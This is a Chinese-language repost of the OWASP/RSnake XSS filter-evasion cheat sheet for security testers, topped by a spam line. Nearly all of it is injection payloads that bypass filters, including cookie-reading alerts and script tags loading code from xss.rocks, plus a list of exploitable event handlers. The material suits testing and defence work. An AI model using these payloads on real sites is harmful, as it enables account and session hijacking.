3atv精品不卡视频,97人人超碰国产精品最新,中文字幕av一区二区三区人妻少妇,久久久精品波多野结衣,日韩一区二区三区精品

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

XSS绕过,XSS过滤速查,XSS绕过姿势

發(fā)布時(shí)間:2024/1/8 编程问答 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XSS绕过,XSS过滤速查,XSS绕过姿势 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

1.介紹

這篇文章的主要目的是給專業(yè)安全測(cè)試人員提供一份跨站腳本漏洞檢測(cè)指南。文章的初始內(nèi)容是由RSnake提供給 OWASP,內(nèi)容基于他的XSS備忘錄:http://ha.ckers.org/xss.html。目前這個(gè)網(wǎng)頁(yè)已經(jīng)重定向到OWASP網(wǎng)站,將由OWASP維護(hù)和完善它。OWASP 的第一個(gè)防御備忘錄項(xiàng)目:XSS (Cross Site Scripting)Prevention Cheat Sheet 靈感來(lái)源于 RSnake 的 XSS Cheat Sheet,所以我們對(duì)他給予我們的啟發(fā)表示感謝。我們想要去創(chuàng)建短小簡(jiǎn)單的參考給開(kāi)發(fā)者以便幫助他們預(yù)防 XSS漏洞,而不是簡(jiǎn)單的告訴他們需要使用復(fù)雜的方法構(gòu)建應(yīng)用來(lái)預(yù)防各種千奇百怪的攻擊,這也是OWASP 備忘錄系列誕生的原因。

2.測(cè)試

這份備忘錄是為那些已經(jīng)理解XSS攻擊,但是想要了解關(guān)于繞過(guò)過(guò)濾器方法之間細(xì)微差別的人準(zhǔn)備的。

請(qǐng)注意大部分的跨站腳本攻擊向量已經(jīng)在其代碼下方給出的瀏覽器列表中進(jìn)行測(cè)試。

2.1.? XSS定位器

在大多數(shù)存在漏洞且不需要特定XSS攻擊代碼的地方插入下列代碼會(huì)彈出包含“XSS”字樣的對(duì)話框。使用URL編碼器來(lái)對(duì)整個(gè)代碼進(jìn)行編碼。小技巧:如果你時(shí)間很緊想要快速檢查頁(yè)面,通常只要插入“<任意文本>”標(biāo)簽,然后觀察頁(yè)面輸出是否明顯改變了就可以判斷是否存在漏洞:

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;

alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–

></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

2.2.? XSS定位器(短)

如果你沒(méi)有足夠的空間并且知道頁(yè)面上沒(méi)有存在漏洞的JavaScript,這個(gè)字符串是一個(gè)不錯(cuò)的簡(jiǎn)潔XSS注入檢查。注入后查看頁(yè)面源代碼并且尋找是否存在<XSS?&lt;XSS字樣來(lái)確認(rèn)是否存在漏洞

”;!–”<XSS>=&{()}?

2.3.? 無(wú)過(guò)濾繞過(guò)

這是一個(gè)常規(guī)的XSS注入代碼,雖然通常它會(huì)被防御,但是建議首先去測(cè)試一下。(引號(hào)在任何現(xiàn)代瀏覽器中都不需要,所以這里省略了它):

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>?

2.4.? 利用多語(yǔ)言進(jìn)行過(guò)濾繞過(guò)

‘”>><marquee><img src=x οnerrοr=confirm(1)></marquee>”></plaintext\></|\><plaintext/οnmοuseοver=prompt(1)>

<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script>

<script>alert(document.cookie)</script>”>

<img/id=”confirm&lpar;1)”/alt=”/”src=”/”οnerrοr=eval(id)>’”>

<img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg“>

2.5.? 通過(guò)JavaScript命令實(shí)現(xiàn)的圖片XSS

圖片注入使用JavaScript命令實(shí)現(xiàn)(IE7.0 不支持在圖片上下文中使用JavaScript 命令,但是可以在其他上下文觸發(fā)。下面的例子展示了一種其他標(biāo)簽依舊通用的原理):

<IMG SRC=”javascript:alert(‘XSS’);”>?

2.6.? 無(wú)分號(hào)無(wú)引號(hào)

<IMG SRC=javascript:alert(‘XSS’)>?

2.7.? 不區(qū)分大小寫(xiě)的XSS攻擊向量

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>?

2.8.? HTML實(shí)體

必須有分號(hào)才可生效

<IMG SRC=javascript:alert(&quot;XSS&quot;)>?

2.9.? 重音符混淆

如果你的JavaScript代碼中需要同時(shí)使用單引號(hào)和雙引號(hào),那么可以使用重音符(`)來(lái)包含JavaScript 代碼。這通常會(huì)有很大幫助,因?yàn)榇蟛糠挚缯灸_本過(guò)濾器都沒(méi)有過(guò)濾這個(gè)字符:

<IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>?

2.10.??? 畸形的A標(biāo)簽

跳過(guò)HREF標(biāo)簽找到XSS的重點(diǎn)。。。由DavidCross提交~已在Chrome上驗(yàn)證

<a οnmοuseοver=”alert(document.cookie)”>xxs link</a>?

此外Chrome經(jīng)常幫你補(bǔ)全確實(shí)的引號(hào)。。。如果在這方面遇到問(wèn)題就直接省略引號(hào),Chrome會(huì)幫你補(bǔ)全在URL或腳本中缺少的引號(hào)。

<a οnmοuseοver=alert(document.cookie)>xxs link</a>?

2.11.??? 畸形的IMG標(biāo)簽

最初由Begeek發(fā)現(xiàn)(短小精湛適用于所有瀏覽器),這個(gè)XSS攻擊向量使用了不嚴(yán)格的渲染引擎來(lái)構(gòu)造含有IMG標(biāo)簽并被引號(hào)包含的XSS攻擊向量。我猜測(cè)這種解析原來(lái)是為了兼容不規(guī)范的編碼。這會(huì)讓它更加難以正確的解析HTML標(biāo)簽:

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>?

2.12.??? fromCharCode函數(shù)

如果不允許任何形式的引號(hào),你可以通過(guò)執(zhí)行JavaScript里的fromCharCode函數(shù)來(lái)創(chuàng)建任何你需要的XSS攻擊向量:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>?

2.13.??? 使用默認(rèn)SRC屬性繞過(guò)SRC域名過(guò)濾器

這種方法可以繞過(guò)大多數(shù)SRC域名過(guò)濾器。將JavaScript代碼插入事件方法同樣適用于注入使用elements的任何HTML標(biāo)簽,例如Form,Iframe, Input, Embed等等。它同樣允許將事件替換為任何標(biāo)簽中可用的事件類型,例如onblur,onclick。下面會(huì)給出許多不同的可注入事件列表。由David Cross提交,Abdullah Hussam(@Abdulahhusam)編輯。

<IMG SRC=# οnmοuseοver=”alert(‘xxs’)”>?

2.14.??? 使用默認(rèn)為空的SRC屬性

<IMG SRC= οnmοuseοver=”alert(‘xxs’)”>?

2.15.??? 使用不含SRC屬性

<IMG οnmοuseοver=”alert(‘xxs’)”>?

2.16.??? 通過(guò)error事件觸發(fā)alert

<IMG SRC=/ οnerrοr=”alert(String.fromCharCode(88,83,83))”></img>?

2.17.??? 對(duì)IMG標(biāo)簽中onerror屬性進(jìn)行編碼

<img src=x οnerrοr=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>?

2.18.??? 十進(jìn)制HTML字符實(shí)體編碼

所有在IMG標(biāo)簽里直接使用javascript:形式的XSS示例無(wú)法在Firefox或Netscape8.1以上瀏覽器(使用Gecko渲染引擎)運(yùn)行。

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

2.19.??? 不帶分號(hào)的十進(jìn)制HTML字符實(shí)體編碼

這對(duì)于繞過(guò)對(duì)“&#XX;”形式的XSS過(guò)濾非常有用,因?yàn)榇蠖鄶?shù)人不知道最長(zhǎng)可使用7位數(shù)字。這同樣對(duì)例如$tmp_string =~s/.*\&#(\d+);.*/$1/;形式的過(guò)濾器有效,這種過(guò)濾器是錯(cuò)誤的認(rèn)為HTML字符實(shí)體編碼需要用分號(hào)結(jié)尾(無(wú)意中發(fā)現(xiàn)的):

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

2.20.??? 不帶分號(hào)的十六進(jìn)制HTML字符實(shí)體編碼

這是有效繞過(guò)例如$tmp_string =~ s/.*\&#(\d+);.*/$1/;過(guò)濾器的方法。這種過(guò)濾器錯(cuò)誤的認(rèn)為#號(hào)后會(huì)跟著數(shù)字(十六進(jìn)制HTML字符實(shí)體編碼并非如此)

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>?

2.21.??? 內(nèi)嵌TAB

使用TAB來(lái)分開(kāi)XSS攻擊代碼:

<IMG SRC=”jav ascript:alert(‘XSS’);”>?

2.22.??? 內(nèi)嵌編碼后TAB

使用編碼后的TAB來(lái)分開(kāi)XSS攻擊代碼:

<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>?

2.23.??? 內(nèi)嵌換行分隔XSS攻擊代碼

一些網(wǎng)站聲稱09到13(十進(jìn)制)的HTML實(shí)體字符都可以實(shí)現(xiàn)這種攻擊,這是不正確的。只有09(TAB),10(換行)和13(回車)有效。查看ASCII字符表獲取更多細(xì)節(jié)。下面幾個(gè)XSS示例介紹了這些向量。

<IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>?

2.24.??? 內(nèi)嵌回車分隔XSS攻擊代碼

注意:上面使用了比實(shí)際需要長(zhǎng)的字符串是因?yàn)?可以忽略。經(jīng)常可以遇到過(guò)濾器解碼十六進(jìn)制和十進(jìn)制編碼時(shí)認(rèn)為只有2到3位字符。實(shí)際規(guī)則是1至7位字符:

<IMG SRC=”jav&#x0D;ascript:alert(‘XSS’);”>?

2.25.??? 使用空字符分隔JavaScript指令

空字符同樣可以作為XSS攻擊向量,但和上面有所區(qū)別,你需要使用一些例如Burp工具或在URL字符串里使用%00,亦或你想使用VIM編寫(xiě)自己的注入工具(^V^@會(huì)生成空字符),還可以通過(guò)程序生成它到一個(gè)文本文件。老版本的Opera瀏覽器(例如Windows版的7.11)還會(huì)受另一個(gè)字符173(軟連字符)的影響。但是空字符%00更加有用并且能幫助繞過(guò)真實(shí)世界里的過(guò)濾器,例如這個(gè)例子里的變形:

perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out?

2.26.??? 利用IMG標(biāo)簽中JavaScript指令前的空格和元字符

如果過(guò)濾器不計(jì)算”javascript:”前的空格,這是正確的,因?yàn)樗鼈儾粫?huì)被解析,但這點(diǎn)非常有用。因?yàn)檫@會(huì)造成錯(cuò)誤的假設(shè),就是引號(hào)和”javascript:”字樣間不能有任何字符。實(shí)際情況是你可以插入任何十進(jìn)制的1至32號(hào)字符:

<IMG SRC=” &#14;? javascript:alert(‘XSS’);”>?

2.27.??? 利用非字母非數(shù)字字符

FireFox的HTML解析器認(rèn)為HTML關(guān)鍵詞后不能有非字母非數(shù)字字符,并且認(rèn)為這是一個(gè)空白或在HTML標(biāo)簽后的無(wú)效符號(hào)。但問(wèn)題是有的XSS過(guò)濾器認(rèn)為它們要查找的標(biāo)記會(huì)被空白字符分隔。例如”<SCRIPT\s” != “<SCRIPT/XSS\s”:

<SCRIPT/XSS SRC=”http://xss.rocks/xss.js“></SCRIPT>?

基于上面的原理,可以使用模糊測(cè)試進(jìn)行擴(kuò)展。Gecko渲染引擎允許任何字符包括字母,數(shù)字或特殊字符(例如引號(hào),尖括號(hào)等)存在于事件名稱和等號(hào)之間,這會(huì)使得更加容易繞過(guò)跨站腳本過(guò)濾。注意這同樣適用于下面看到的重音符:

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>?

Yair Amit讓我注意到了IE和Gecko渲染引擎有一點(diǎn)不同行為,在于是否在HTML標(biāo)簽和參數(shù)之間允許一個(gè)不含空格的斜杠。這會(huì)非常有用如果系統(tǒng)不允許空格的時(shí)候。

<SCRIPT/SRC=”http://xss.rocks/xss.js“></SCRIPT>?

2.28.??? 額外的尖括號(hào)

由Franz Sedlmaier提交,這個(gè)XSS攻擊向量可以繞過(guò)某些檢測(cè)引擎,比如先查找第一個(gè)匹配的尖括號(hào),然后比較里面的標(biāo)簽內(nèi)容,而不是使用更有效的算法,例如Boyer-Moore算法就是查找整個(gè)字符串中的尖括號(hào)和相應(yīng)標(biāo)簽(當(dāng)然是通過(guò)模糊匹配)。雙斜杠注釋了額外的尖括號(hào)來(lái)防止出現(xiàn)JavaScript錯(cuò)誤:

<<SCRIPT>alert(“XSS”);//<</SCRIPT>?

2.29.??? 未閉合的script標(biāo)簽

在Firefox和Netscape 8.1的Gecko渲染引擎下你不是必須構(gòu)造類似“></SCRIPT>”的跨站腳本攻擊向量。Firefox假定閉合HTML標(biāo)簽是安全的并且會(huì)為你添加閉合標(biāo)記。多么體貼!不像不影響Firefox的下一個(gè)問(wèn)題,這不需要在后面有額外的HTML標(biāo)簽。如果需要可以添加引號(hào),但通常是沒(méi)有必要的,需要注意的是,我并不知道這樣注入后HTML會(huì)什么樣子結(jié)束:

<SCRIPT SRC=http://xss.rocks/xss.js?< B >?

2.30.??? script標(biāo)簽中的協(xié)議解析

這個(gè)特定的變體是由?ukasz Pilorz提交的并且基于Ozh提供的協(xié)議解析繞過(guò)。這個(gè)跨站腳本示例在IE和Netscape的IE渲染模式下有效,如果添加了</SCRIPT>標(biāo)記在Opera中也可以。這在輸入空間有限的情況下是非常有用的,你所使用的域名越短越好。”.j”是可用的,在SCRIPT標(biāo)簽中不需要考慮編碼類型因?yàn)闉g覽器會(huì)自動(dòng)識(shí)別。

<SCRIPT SRC=//xss.rocks/.j>?

2.31.??? 只含左尖括號(hào)的HTML/JavaScript XSS向量

IE渲染引擎不像Firefox,不會(huì)向頁(yè)面中添加額外數(shù)據(jù)。但它允許在IMG標(biāo)簽中直接使用javascript。這對(duì)構(gòu)造攻擊向量是很有用的,因?yàn)椴恍枰]合尖括號(hào)。這使得有任何HTML標(biāo)簽都可以進(jìn)行跨站腳本攻擊向量注入。甚至可以不使用”>”閉合標(biāo)簽。注意:這會(huì)讓HTML頁(yè)面變得混亂,具體程度取決于下面的HTML標(biāo)簽。這可以繞過(guò)以下NIDS正則:/((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/因?yàn)椴恍枰?gt;”閉合。另外在實(shí)際對(duì)抗XSS過(guò)濾器的時(shí)候,使用一個(gè)半開(kāi)放的<IFRAME標(biāo)簽替代<IMG標(biāo)簽也是非常有效的。

<IMG SRC=”javascript:alert(‘XSS’)”?

?

2.32.??? 多個(gè)左尖括號(hào)

?

?

使用一個(gè)左尖括號(hào)替代右尖括號(hào)作為標(biāo)簽結(jié)尾的攻擊向量會(huì)在不同瀏覽器的Gecko渲染引擎下有不同表現(xiàn)。沒(méi)有左尖括號(hào)時(shí),在Firefox中生效,而在Netscape中無(wú)效。

<iframe src=http://xss.rocks/scriptlet.html?<?

?

?

2.33.??? JavaScript雙重轉(zhuǎn)義

?

?

當(dāng)應(yīng)用將一些用戶輸入輸出到例如:<SCRIPT>var a=”$ENV{QUERY_STRING}”;</SCRIPT>的JavaScript中時(shí),你想注入你的JavaScript腳本,你可以通過(guò)轉(zhuǎn)義轉(zhuǎn)義字符來(lái)規(guī)避服務(wù)器端轉(zhuǎn)義引號(hào)。注入后會(huì)得到<SCRIPT>vara=”\\”;alert(‘XSS’);//”;</SCRIPT>,這時(shí)雙引號(hào)不會(huì)被轉(zhuǎn)義并且可以觸發(fā)跨站腳本攻擊向量。XSS定位器就用了這種方法:

\”;alert(‘XSS’);//?

?

?

另一種情況是,如果內(nèi)嵌數(shù)據(jù)進(jìn)行了正確的JSON或JavaScript轉(zhuǎn)義,但沒(méi)有HTML編碼,那可以結(jié)束原有腳本塊并開(kāi)始你自己的:

</script><script>alert(‘XSS’);</script>?

?

?

2.34.??? 閉合title標(biāo)簽

?

?

這是一個(gè)簡(jiǎn)單的閉合<TITLE>標(biāo)簽的XSS攻擊向量,可以包含惡意的跨站腳本攻擊:

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>?

?

?

2.35.??? INPUT image

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>?

?

?

?

?

2.36.??? BODY image

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>?

?

?

?

?

2.37.??? IMG Dynsrc

<IMG DYNSRC=”javascript:alert(‘XSS’)”>?

?

?

?

?

2.38.??? IMG lowsrc

<IMG LOWSRC=”javascript:alert(‘XSS’)”>?

?

?

?

?

2.39.??? List-style-image

?

?

?

處理嵌入的圖片列表是很麻煩的問(wèn)題。由于JavaScript指令的原因只能在IE渲染引擎下有效。不是一個(gè)特別有用的跨站腳本攻擊向量:

<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br>?

?

?

2.40.??? 圖片中引用VBscript

<IMG SRC=’vbscript:msgbox(“XSS”)’>?

?

?

?

?

2.41.??? Livescript (僅限舊版本Netscape)

<IMG SRC=”livescript:[code]">?

?

?

?

?

2.42.??? SVG對(duì)象標(biāo)簽

<svg/οnlοad=alert('XSS')>?

?

?

?

?

2.43.??? ECMAScript 6

Set.constructor`alert\x28document.domain\x29```?

?

?

?

?

2.44.??? BODY標(biāo)簽

?

?

這個(gè)方法不需要使用任何例如"javascript:"或"<SCRIPT..."語(yǔ)句來(lái)完成XSS攻擊。Dan Crowley特別提醒你可以在等號(hào)前加入一個(gè)空格("οnlοad=" != "onload ="):

<BODY ONLOAD=alert('XSS')>?

?

?

2.45.??? 事件處理程序

?

?

在XSS攻擊中可使用以下事件(在完稿的時(shí)候這是網(wǎng)上最全的列表了)。感謝ReneLedosquet的更新。

?

?

1.????FSCommand() (攻擊者當(dāng)需要在嵌入的Flash對(duì)象中執(zhí)行時(shí)可以使用此事件)

?

2.????onAbort() (當(dāng)用戶中止加載圖片時(shí))

?

3.????onActivate() (當(dāng)對(duì)象激活時(shí))

?

4.????onAfterPrint() (用戶打印或進(jìn)行打印預(yù)覽后觸發(fā))

?

5.????onAfterUpdate() (從數(shù)據(jù)源對(duì)象更新數(shù)據(jù)后由數(shù)據(jù)對(duì)象觸發(fā))

?

6.????onBeforeActivate() (在對(duì)象設(shè)置為激活元素前觸發(fā))

?

7.????onBeforeCopy() (攻擊者在選中部分拷貝到剪貼板前執(zhí)行攻擊代碼-攻擊者可以通過(guò)執(zhí)行execCommand("Copy")函數(shù)觸發(fā))

?

8.????onBeforeCut() (攻擊者在選中部分剪切到剪貼板前執(zhí)行攻擊代碼)

?

9.????onBeforeDeactivate() (在當(dāng)前對(duì)象的激活元素變化前觸發(fā))

?

10.??onBeforeEditFocus() (在一個(gè)包含可編輯元素的對(duì)象進(jìn)入激活狀態(tài)時(shí)或一個(gè)可編輯的對(duì)象被選中時(shí)觸發(fā))

?

11.??onBeforePaste() (在用戶被誘導(dǎo)進(jìn)行粘貼前或使用execCommand("Paste")函數(shù)觸發(fā))

?

12.??onBeforePrint() (用戶需要被誘導(dǎo)進(jìn)行打印或攻擊者可以使用print()或execCommand("Print")函數(shù)).

?

13.??onBeforeUnload() (用戶需要被誘導(dǎo)關(guān)閉瀏覽器-除非從父窗口執(zhí)行,否則攻擊者不能關(guān)閉當(dāng)前窗口)

?

14.??onBeforeUpdate() (從數(shù)據(jù)源對(duì)象更新數(shù)據(jù)前由數(shù)據(jù)對(duì)象觸發(fā))

?

15.??onBegin() (當(dāng)元素周期開(kāi)始時(shí)由onbegin 事件立即觸發(fā))

?

16.??onBlur() (另一個(gè)窗口彈出當(dāng)前窗口失去焦點(diǎn)時(shí)觸發(fā))

?

17.??onBounce() (當(dāng)marquee對(duì)象的behavior屬性設(shè)置為“alternate”且字幕的滾動(dòng)內(nèi)容到達(dá)窗口一邊時(shí)觸發(fā))

?

18.??onCellChange() (當(dāng)數(shù)據(jù)提供者的數(shù)據(jù)變化時(shí)觸發(fā))

?

19.??onChange() (select,text, 或TEXTAREA字段失去焦點(diǎn)并且值發(fā)生變化時(shí)觸發(fā))

?

20.??onClick() (表單中點(diǎn)擊觸發(fā))

?

21.??onContextMenu() (用戶需要在攻擊區(qū)域點(diǎn)擊右鍵)

?

22.??onControlSelect() (當(dāng)用戶在一個(gè)對(duì)象上創(chuàng)建控件選中區(qū)時(shí)觸發(fā))

?

23.??onCopy() (用戶需要復(fù)制一些東西或使用execCommand("Copy")命令時(shí)觸發(fā))

?

24.??onCut() (用戶需要剪切一些東西或使用execCommand("Cut")命令時(shí)觸發(fā))

?

25.??onDataAvailable() (用戶需要修改元素中的數(shù)據(jù),或者由攻擊者提供的類似功能)

?

26.??onDataSetChanged() (當(dāng)數(shù)據(jù)源對(duì)象變更導(dǎo)致數(shù)據(jù)集發(fā)生變更時(shí)觸發(fā))

?

27.??onDataSetComplete() (數(shù)據(jù)源對(duì)象中所有數(shù)據(jù)可用時(shí)觸發(fā))

?

28.??onDblClick() (用戶雙擊一個(gè)表單元素或鏈接)

?

29.??onDeactivate() (在激活元素從當(dāng)前對(duì)象轉(zhuǎn)換到父文檔中的另一個(gè)對(duì)象時(shí)觸發(fā))

?

30.??onDrag() (在元素正在拖動(dòng)時(shí)觸發(fā))

?

31.??onDragEnd() (當(dāng)用戶完成元素的拖動(dòng)時(shí)觸發(fā))

?

32.??onDragLeave() (用戶在拖動(dòng)元素離開(kāi)放置目標(biāo)時(shí)觸發(fā))

?

33.??onDragEnter() (用戶將對(duì)象拖拽到合法拖曳目標(biāo))

?

34.??onDragOver() (用戶將對(duì)象拖拽劃過(guò)合法拖曳目標(biāo))

?

35.??onDragDrop() (用戶將一個(gè)對(duì)象(例如文件)拖拽到瀏覽器窗口)

?

36.??onDragStart() (當(dāng)用戶開(kāi)始拖動(dòng)元素時(shí)觸發(fā))

?

37.??onDrop() (當(dāng)拖動(dòng)元素放置在目標(biāo)區(qū)域時(shí)觸發(fā))

?

38.??onEnded() (在視頻/音頻(audio/video)播放結(jié)束時(shí)觸發(fā))

?

39.??onError() (在加載文檔或圖像時(shí)發(fā)生錯(cuò)誤)

?

40.??onErrorUpdate() (當(dāng)從數(shù)據(jù)源對(duì)象更新相關(guān)數(shù)據(jù)遇到錯(cuò)誤時(shí)在數(shù)據(jù)綁定對(duì)象上觸發(fā))

?

41.??onFilterChange() (當(dāng)濾鏡完成狀態(tài)變更時(shí)觸發(fā))

?

42.??onFinish() (當(dāng)marquee完成滾動(dòng)時(shí)攻擊者可以執(zhí)行攻擊)

?

43.??onFocus() (當(dāng)窗口獲得焦點(diǎn)時(shí)攻擊者可以執(zhí)行攻擊代碼)

?

44.??onFocusIn() (當(dāng)元素將要被設(shè)置為焦點(diǎn)之前觸發(fā))

?

45.??onFocusOut() (攻擊者可以在窗口失去焦點(diǎn)時(shí)觸發(fā)攻擊代碼)

?

46.??onHashChange() (當(dāng)錨部分發(fā)生變化時(shí)觸發(fā)攻擊代碼)

?

47.??onHelp() (攻擊者可以在用戶在當(dāng)前窗體激活時(shí)按下F1觸發(fā)攻擊代碼)

?

48.??onInput() (在 <input> 或 <textarea> 元素的值發(fā)生改變時(shí)觸發(fā))

?

49.??onKeyDown() (用戶按下一個(gè)鍵的時(shí)候觸發(fā))

?

50.??onKeyPress() (在鍵盤(pán)按鍵被按下并釋放一個(gè)鍵時(shí)觸發(fā))

?

51.??onKeyUp() (用戶釋放一個(gè)鍵時(shí)觸發(fā))

?

52.??onLayoutComplete() (用戶進(jìn)行完打印或打印預(yù)覽時(shí)觸發(fā))

?

53.??onLoad() (攻擊者在窗口加載后觸發(fā)攻擊代碼)

?

54.??onLoseCapture() (可以由releaseCapture()方法觸發(fā))

?

55.??onMediaComplete() (當(dāng)一個(gè)流媒體文件使用時(shí),這個(gè)事件可以在文件播放前觸發(fā))

?

56.??onMediaError() (當(dāng)用戶在瀏覽器中打開(kāi)一個(gè)包含媒體文件的頁(yè)面,出現(xiàn)問(wèn)題時(shí)觸發(fā)事件)

?

57.??onMessage() (當(dāng)頁(yè)面收到一個(gè)信息時(shí)觸發(fā)事件)

?

58.??onMouseDown() (攻擊者需要讓用戶點(diǎn)擊一個(gè)圖片觸發(fā)事件)

?

59.??onMouseEnter() (光標(biāo)移動(dòng)到一個(gè)對(duì)象或區(qū)域時(shí)觸發(fā))

?

60.??onMouseLeave() (攻擊者需要讓用戶光標(biāo)移動(dòng)到一個(gè)圖像或表格然后移開(kāi)來(lái)觸發(fā)事件)

?

61.??onMouseMove() (攻擊者需要讓用戶將光標(biāo)移到一個(gè)圖片或表格)

?

62.??onMouseOut() (攻擊者需要讓用戶光標(biāo)移動(dòng)到一個(gè)圖像或表格然后移開(kāi)來(lái)觸發(fā)事件)

?

63.??onMouseOver() (光標(biāo)移動(dòng)到一個(gè)對(duì)象或區(qū)域)

?

64.??onMouseUp() (攻擊者需要讓用戶點(diǎn)擊一個(gè)圖片)

?

65.??onMouseWheel() (攻擊者需要讓用戶使用他們的鼠標(biāo)滾輪)

?

66.??onMove() (用戶或攻擊者移動(dòng)頁(yè)面時(shí)觸發(fā))

?

67.??onMoveEnd() (用戶或攻擊者移動(dòng)頁(yè)面結(jié)束時(shí)觸發(fā))

?

68.??onMoveStart() (用戶或攻擊者開(kāi)始移動(dòng)頁(yè)面時(shí)觸發(fā))

?

69.??onOffline() (當(dāng)瀏覽器從在線模式切換到離線模式時(shí)觸發(fā))

?

70.??onOnline() (當(dāng)瀏覽器從離線模式切換到在線模式時(shí)觸發(fā))

?

71.??onOutOfSync() (當(dāng)元素與當(dāng)前時(shí)間線失去同步時(shí)觸發(fā))

?

72.??onPaste() (用戶進(jìn)行粘貼時(shí)或攻擊者可以使用execCommand("Paste")函數(shù)時(shí)觸發(fā))

?

73.??onPause() (在視頻或音頻暫停時(shí)觸發(fā))

?

74.??onPopState() (在窗口的瀏覽歷史(history 對(duì)象)發(fā)生改變時(shí)觸發(fā))

?

75.??onProgress() (攻擊者可以在一個(gè)FLASH加載時(shí)觸發(fā)事件)

?

76.??onPropertyChange() (用戶或攻擊者需要改變?cè)貙傩詴r(shí)觸發(fā))

?

77.??onReadyStateChange() (每次 readyState 屬性變化時(shí)被自動(dòng)調(diào)用)

?

78.??onRedo() (用戶返回上一頁(yè)面時(shí)觸發(fā))

?

79.??onRepeat() (事件在播放完重復(fù)播放時(shí)觸發(fā))

?

80.??onReset() (用戶或攻擊者重置表單時(shí)觸發(fā))

?

81.??onResize() (用戶改變窗口大小時(shí),攻擊者可以自動(dòng)以這種方法觸發(fā):<SCRIPT>self.resizeTo(500,400);</SCRIPT>)

?

82.??onResizeEnd() (用戶完成改變窗體大小時(shí)觸發(fā))

?

83.??onResizeStart() (用戶開(kāi)始改變窗體大小時(shí)觸發(fā))

?

84.??onResume() (當(dāng)元素繼續(xù)播放時(shí)觸發(fā))

?

85.??onReverse() (當(dāng)元素回放時(shí)觸發(fā))

?

86.??onRowsEnter() (用戶或攻擊者需要改變數(shù)據(jù)源中的一行)

?

87.??onRowExit() (用戶或攻擊者改變數(shù)據(jù)源中的一行后退出時(shí)觸發(fā))

?

88.??onRowDelete() (用戶或攻擊者需要?jiǎng)h除數(shù)據(jù)源中的一行)

?

89.??onRowInserted() (user or attacker would needto insert a row in a data source)

?

90.??onScroll() (用戶需要滾動(dòng)或攻擊者使用scrollBy()函數(shù))

?

91.??onSeek() (當(dāng)用戶在元素上執(zhí)行查找操作時(shí)觸發(fā))

?

92.??onSelect() (用戶需要選擇一些文本-攻擊者可以以此方式觸發(fā): window.document.execCommand("SelectAll");)

?

93.??onSelectionChange() (當(dāng)用戶選擇文本變化時(shí)觸發(fā)-攻擊者可以以此方式觸發(fā): window.document.execCommand("SelectAll");)

?

94.??onSelectStart() (當(dāng)用戶開(kāi)始選擇文本時(shí)觸發(fā)-攻擊者可以以此方式觸發(fā): window.document.execCommand("SelectAll");)

?

95.??onStart() (在marquee 對(duì)象開(kāi)始循環(huán)時(shí)觸發(fā))

?

96.??onStop() (當(dāng)用戶按下停止按鈕或離開(kāi)頁(yè)面時(shí)觸發(fā))

?

97.??onStorage() (當(dāng)Web Storage更新時(shí)觸發(fā))

?

98.??onSyncRestored() (當(dāng)元素與它的時(shí)間線恢復(fù)同步時(shí)觸發(fā))

?

99.??onSubmit() (需要用戶或攻擊者提交表單)

?

100.onTimeError() (用戶或攻擊者設(shè)置時(shí)間屬性出現(xiàn)錯(cuò)誤時(shí)觸發(fā))

?

101.onTrackChange() (用戶或攻擊者改變播放列表內(nèi)歌曲時(shí)觸發(fā))

?

102.onUndo() (用戶返回上一瀏覽記錄頁(yè)面時(shí)觸發(fā))

?

103.onUnload() (用戶點(diǎn)擊任意鏈接或按下后退按鈕或攻擊者強(qiáng)制進(jìn)行點(diǎn)擊時(shí)觸發(fā))

?

104.onURLFlip() (當(dāng)一個(gè)高級(jí)流媒體格式(ASF)文件,由一個(gè)HTML+TIME(基于時(shí)間交互的多媒體擴(kuò)展)媒體標(biāo)簽播放時(shí),可觸發(fā)在ASF文件中內(nèi)嵌的攻擊腳本)

?

105.seekSegmentTime() (這是一個(gè)方法可以定位元素某個(gè)時(shí)間段內(nèi)中的特定的點(diǎn),并可以從該點(diǎn)播放。這個(gè)段落包含了一個(gè)重復(fù)的時(shí)間線,并包括使用AUTOREVERSE屬性進(jìn)行反向播放。)

?

2.46.??? BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">?

?

?

?

?

